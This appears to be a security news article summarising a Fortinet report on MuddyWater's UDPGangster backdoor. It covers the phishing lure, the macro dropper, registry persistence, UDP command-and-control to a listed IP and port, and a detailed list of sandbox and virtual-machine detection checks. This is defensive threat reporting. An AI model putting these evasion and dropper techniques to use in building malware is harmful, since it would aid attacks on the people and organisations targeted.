The Iranian hacking group known as MuddyWater has been observed leveraging a new backdoor dubbed UDPGangster that uses the User Datagram Protocol (UDP) for command-and-control (C2) purposes. The cyber espionage activity targeted users in Turkey, Israel, and Azerbaijan, according to a report from Fortinet FortiGuard Labs. “This malware enables remote control of compromised systems by allowing attackers to execute commands, exfiltrate files, and deploy additional payloads – all communicated through UDP channels designed to evade traditional network defenses,” security researcher Cara Lin said . The attack chain involves using spear-phishing tactics to distribute booby-trapped Microsoft Word documents that trigger the execution of a malicious payload once macros are enabled.

Some of the phishing messages impersonate the Turkish Republic of Northern Cyprus Ministry of Foreign Affairs and purport to invite recipients to an online seminar titled “Presidential Elections and Results.” Attached along with the emails are a ZIP file (“seminer.zip”) and a Word document (“seminer.doc”). The ZIP file also contains the same Word file, opening which users are asked to enable macros to stealthily execute embedded VBA code. For its part, the VBA script in the dropper file is equipped to conceal any sign of malicious activity by displaying a Hebrew-language decoy image from Israeli telecommunications provider Bezeq about supposed disconnection periods in the first week of November 2025 across various cities in the country. “The macro uses the Document_Open() event to automatically execute, decoding Base64-encoded data from a hidden form field (UserForm1.bodf90.Text) and writing the decoded content to C:\Users\Public\ui.txt,” Lin explained.

“It then executes this file using the Windows API CreateProcessA, launching the UDPGangster payload.” UDPGangster establishes persistence through Windows Registry modifications and boasts of various anti-analysis checks to resist efforts made by security researchers to take it apart. This includes - Verifying if the process is being debugged Analyzing CPU configurations for sandboxes or virtual machines Determining if the system has less than 2048 MB of RAM Retrieving network adapter information to validate if the MAC address prefix matches a list of known virtual machine vendors Validating if the computer is part of the default Windows workgroup rather than a joined domain Examining running processes for tools like VBoxService.exe, VBoxTray.exe, vmware.exe, and vmtoolsd.exe Running Registry scans to searches for matches to known virtualization vendor identifiers, such as VBox, VMBox, QEMU, VIRTUAL, VIRTUALBOX, VMWARE, and Xen Searching for known sandboxing or debugging tools, and Ascertaining whether the file is running in an analysis environment It’s only after these checks are satisfied does UDPGangster proceed to gather system information and connects to an external server (“157.20.182[.]75”) over UDP port 1269 to exfiltrate collected data, run commands using “cmd.exe,” transmit files, update C2 server, and drop and execute additional payloads. “UDPGangster uses macro-based droppers for initial access and incorporates extensive anti-analysis routines to evade detection,” Lin said. “Users and organizations should remain cautious of unsolicited documents, particularly those requesting macro activation.” The development comes days after ESET attributed the threat actor to attacks spanning academia, engineering, local government, manufacturing, technology, transportation, and utilities sectors in Israel that delivered another backdoor referred to as MuddyViper .

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.